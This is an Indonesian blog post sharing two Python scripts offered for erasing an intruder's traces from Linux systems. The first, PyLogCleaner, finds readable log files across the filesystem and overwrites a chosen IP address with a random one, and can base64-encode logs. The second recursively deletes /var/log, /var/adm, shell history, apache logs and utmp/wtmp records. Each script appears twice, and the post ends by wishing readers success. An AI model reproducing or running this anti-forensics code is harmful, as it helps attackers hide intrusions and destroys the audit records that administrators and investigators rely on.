Python Log Cleaner

Share code untuk tools pembersih “log” dengan menggunakan phython, manfaatnya adalah anda bisa menghilangkan jejak sejenak dari log yang tersimpan.

Berikut ini codenya:

#!/usr/bin/python #PyLogcleaner uses the list given (logfiles) containing # 274 logfiles and uses the linux find #cmd to try and locate more logfiles to search #for an ip address to replace with a random generated #one. It can also encrypt/d3crypt a #logfile and also can watch a logfile for modifications. import os, sys, time, pwd, getopt, re, random, StringIO, commands def title(): print "\n PyLogCleaner v1.0" print "-----------------------------------------------" def usage(): title() print "\n Usage: python logcleaner.py <option>\n" print "\t[options]" print "\t -i <ip>: Ip to search for and replace" print "\t -e <file>: Encrypts logfile" print "\t -d <file>: Decrypts logfile" print "\t -w/-watch <file> <time to check> : Watches logfile for modification" print "\t -h/-help: Prints this menu\n" def timer(): now = time.localtime(time.time()) return time.asctime(now) def validater(logs): activeLogs = [] print "[+] Validating:",len(logs),"logfiles\n" for l in logs: if os.path.isfile(l) == True: activeLogs.append(l) if len(activeLogs)>0: print "[+] Active Logs Found:",len(activeLogs) return activeLogs else: print "[-] No Active Logs Found" sys.exit(1) def search(logfiles): print "\n[+] Searching:",ip,"\n" import mmap for file in logfiles: try: f = open(file, "rb+") size = os.path.getsize(file) if size >= 1: data = mmap.mmap(f.fileno(), size) loc = data.find(ip) #Lets not search a file with no data. if loc == -1: #print "[+] File:",file,"|",size,"bytes" #print "\t[-] IP not found" data.close() else: print "-"*45 print "[+] File:",file,"|",size,"bytes" print "\t[+] IP found" data.seek(loc) data.write(randip) print "[+] Replaced: ",ip,">>",randip print "[+] New_Size:",os.path.getsize(file),"bytes" print "-"*45 data.close() except(IOError), msg: pass print "\n[+] Done:",timer(),"\n" def findlogs(): os.chdir("/") print "[+] Finding More Logfiles..." #Lets use the linux find cmd to fing more files containing log... logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines() if len(logz)>0: print "[+] Found:",len(logz),"extra logfiles" for log in logz: if re.search("Permission denied",log) == None: logs.append(log[:-1]) return logs def randip(): A = random.randrange(255) + 1 B = random.randrange(255) + 1 C = random.randrange(255) + 1 D = random.randrange(255) + 1 randip = "%d.%d.%d.%d" % (A,B,C,D) return randip def gettime(): clock = time.asctime(time.localtime(os.path.getmtime(logfile))) return clock def getsize(): size = os.path.getsize(logfile) return size def modlast(logfile): try: sys.argv[3] except(IndexError): print "\n[-] Need a time in seconds (ex: 60)\n" sys.exit(1) print "[+] Analyzing:",logfile print "[+] Time:",sys.argv[3],"secs" print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0] print "[+] Size:",getsize(),"bytes" print "[+] Last Modified:",gettime() print "[+] Starting:",timer() old_time = gettime() while True: time.sleep(int(sys.argv[3])) new_time = gettime() if new_time != old_time: print "\n[+] File Modified:",new_time print "[+] New Size:",getsize(),"bytes\n" old_time = new_time def encrypter(file): import base64 print "\n[+] Encrypting:",file print "[+] Size:",os.path.getsize(file),"bytes" try: log2encode = open(file, "r").read() except(IOError): print "Error: Check your full path.\n" sys.exit(1) log2encode = base64.b64encode(log2encode) os.remove(file) time.sleep(2) f = open(file, "a") f.write(log2encode) f.close() print "[+] NewSize:",os.path.getsize(file),"bytes" print "[+] Done\n" def d3crypter(file): import base64 print "\n[+] Decrypting:",file print "[+] Size:",os.path.getsize(file),"bytes" try: b2log = open(file, "r").read() except(IOError): print "Error: Check your full path.\n" sys.exit(1) b2log = base64.b64decode(b2log) os.remove(file) time.sleep(2) f = open(file, "a") f.write(b2log) f.close() print "[+] NewSize:",os.path.getsize(file),"bytes" print "[+] Done\n" if len(sys.argv) <= 1: usage() sys.exit(1) if len(sys.argv) == 2: usage() sys.exit(1) if sys.argv[1] == "-w" or sys.argv[1] == "-watch": logfile = sys.argv[2] if os.path.isfile(logfile) == False: title() print "\n[-] Cannot Open File, Check Full Path!!!\n" sys.exit(1) else: title() modlast(logfile) if sys.argv[1] == "-i": ip = sys.argv[2] try: logs = open("logfiles", "r").readlines() except(IOError): print "Error: logfiles missing\n" sys.exit(1) title() print "\n[+] Starting:",timer() print "[+] Loaded:",len(logs),"logs" findlogs() randip = randip() print "[+] Generate Random IP:",randip search(validater(logs)) if sys.argv[1] == "-e": file = sys.argv[2] title() encrypter(file) if sys.argv[1] == "-d": file = sys.argv[2] title() d3crypter(file)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202

#!/usr/bin/python #PyLogcleaner uses the list given (logfiles) containing # 274 logfiles and uses the linux find #cmd to try and locate more logfiles to search #for an ip address to replace with a random generated #one. It can also encrypt/d3crypt a #logfile and also can watch a logfile for modifications.     import os, sys, time, pwd, getopt, re, random, StringIO, commands   def title():     print "\n   PyLogCleaner v1.0"     print "-----------------------------------------------"   def usage():     title()     print "\n  Usage: python logcleaner.py \n"     print "\t[options]"     print "\t   -i : Ip to search for and replace"     print "\t   -e : Encrypts logfile"     print "\t   -d : Decrypts logfile"     print "\t   -w/-watch : Watches logfile for modification"     print "\t   -h/-help: Prints this menu\n"   def timer():     now = time.localtime(time.time())     return time.asctime(now)   def validater(logs):          activeLogs = []       print "[+] Validating:",len(logs),"logfiles\n"     for l in logs:         if os.path.isfile(l) == True:             activeLogs.append(l)     if len(activeLogs)>0:         print "[+] Active Logs Found:",len(activeLogs)         return activeLogs     else:         print "[-] No Active Logs Found"         sys.exit(1)          def search(logfiles):          print "\n[+] Searching:",ip,"\n"     import mmap          for file in logfiles:         try:             f = open(file, "rb+")             size = os.path.getsize(file)             if size >= 1:                 data = mmap.mmap(f.fileno(), size)                 loc = data.find(ip)                 #Lets not search a file with no data.                 if loc == -1:                     #print "[+] File:",file,"|",size,"bytes"                     #print "\t[-] IP not found"                     data.close()                 else:                     print "-"*45                     print "[+] File:",file,"|",size,"bytes"                     print "\t[+] IP found"                     data.seek(loc)                     data.write(randip)                     print "[+] Replaced: ",ip,">>",randip                     print "[+] New_Size:",os.path.getsize(file),"bytes"                     print "-"*45                     data.close()         except(IOError), msg:             pass     print "\n[+] Done:",timer(),"\n"                      def findlogs():     os.chdir("/")          print "[+] Finding More Logfiles..."     #Lets use the linux find cmd to fing more files containing log...     logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()     if len(logz)>0:         print "[+] Found:",len(logz),"extra logfiles"         for log in logz:             if re.search("Permission denied",log) == None:                 logs.append(log[:-1])     return logs      def randip():          A = random.randrange(255) + 1     B = random.randrange(255) + 1     C = random.randrange(255) + 1     D = random.randrange(255) + 1     randip = "%d.%d.%d.%d" % (A,B,C,D)     return randip   def gettime():     clock = time.asctime(time.localtime(os.path.getmtime(logfile)))     return clock   def getsize():     size = os.path.getsize(logfile)     return size   def modlast(logfile):     try:         sys.argv[3]     except(IndexError):         print "\n[-] Need a time in seconds (ex: 60)\n"         sys.exit(1)              print "[+] Analyzing:",logfile     print "[+] Time:",sys.argv[3],"secs"     print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]     print "[+] Size:",getsize(),"bytes"     print "[+] Last Modified:",gettime()     print "[+] Starting:",timer()       old_time = gettime()     while True:         time.sleep(int(sys.argv[3]))         new_time = gettime()         if new_time != old_time:             print "\n[+] File Modified:",new_time             print "[+] New Size:",getsize(),"bytes\n"             old_time = new_time      def encrypter(file):     import base64     print "\n[+] Encrypting:",file     print "[+] Size:",os.path.getsize(file),"bytes"     try:           log2encode = open(file, "r").read()     except(IOError):           print "Error: Check your full path.\n"           sys.exit(1)     log2encode = base64.b64encode(log2encode)     os.remove(file)     time.sleep(2)     f = open(file, "a")     f.write(log2encode)     f.close()     print "[+] NewSize:",os.path.getsize(file),"bytes"     print "[+] Done\n"   def d3crypter(file):     import base64     print "\n[+] Decrypting:",file     print "[+] Size:",os.path.getsize(file),"bytes"     try:           b2log = open(file, "r").read()     except(IOError):           print "Error: Check your full path.\n"           sys.exit(1)     b2log = base64.b64decode(b2log)     os.remove(file)     time.sleep(2)     f = open(file, "a")     f.write(b2log)     f.close()     print "[+] NewSize:",os.path.getsize(file),"bytes"     print "[+] Done\n"   if len(sys.argv) <= 1:     usage()     sys.exit(1) if len(sys.argv) == 2:     usage()     sys.exit(1)   if sys.argv[1] == "-w" or sys.argv[1] == "-watch":     logfile = sys.argv[2]     if os.path.isfile(logfile) == False:         title()         print "\n[-] Cannot Open File, Check Full Path!!!\n"         sys.exit(1)     else:         title()         modlast(logfile) if sys.argv[1] == "-i":     ip = sys.argv[2]             try:           logs = open("logfiles", "r").readlines()     except(IOError):           print "Error: logfiles missing\n"           sys.exit(1)     title()     print "\n[+] Starting:",timer()     print "[+] Loaded:",len(logs),"logs"     findlogs()     randip = randip()     print "[+] Generate Random IP:",randip     search(validater(logs)) if sys.argv[1] == "-e":     file = sys.argv[2]     title()     encrypter(file) if sys.argv[1] == "-d":     file = sys.argv[2]     title()     d3crypter(file)

Download Tools Disini:

Bisa juga menggunakan tools dari Vodork YCL berikut:

Code:

Python

#!/usr/bin/env python import threading import os from time import sleep, ctime print''' _ _ ___ _ ( ) ( )( _`\ ( ) ``\_/'/'| ( (_)| | `\ /' | | _ | | _ | | | (_( )| |_( ) (_) (____/'(____/'og cleaner Kinds Regard ./VodOrkYCL.py ''' lt = ctime() print '[+] Starting log cleaner at %s\n\n' %(lt) sleep(5) class output_command(threading.Thread): def __init__(self, command): threading.Thread.__init__(self) self.command = command def run(self): os.system(self.command) print "[+]log was finish to clean......\n" class input_command: def __init__(self): clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf /etc/wtmp","rm -rf /etc/utmp"] for listt in clear_add: try: i=output_command(listt) i.start() except: pass if __name__ == "__main__": objCaller = input_command()

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

#!/usr/bin/env python   import threading import os from time import sleep, ctime   print'''      _     _  ___    _     ( )   ( )(  _`\ ( )     ``\_/'/'| ( (_)| |       `\ /'  | |  _ | |  _        | |   | (_( )| |_( )        (_)   (____/'(____/'og cleaner                  Kinds Regard                         ./VodOrkYCL.py     ''' lt = ctime() print '[+] Starting log cleaner at %s\n\n' %(lt) sleep(5)   class output_command(threading.Thread):     def __init__(self, command):         threading.Thread.__init__(self)         self.command = command     def run(self):         os.system(self.command)         print "[+]log was finish to clean......\n"   class input_command:     def __init__(self):                 clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf /etc/wtmp","rm -rf /etc/utmp"]                 for listt in clear_add:                     try:                       i=output_command(listt)                       i.start()                     except:                       pass   if __name__ == "__main__":        objCaller = input_command()

Selamat mencoba, semoga berhasil!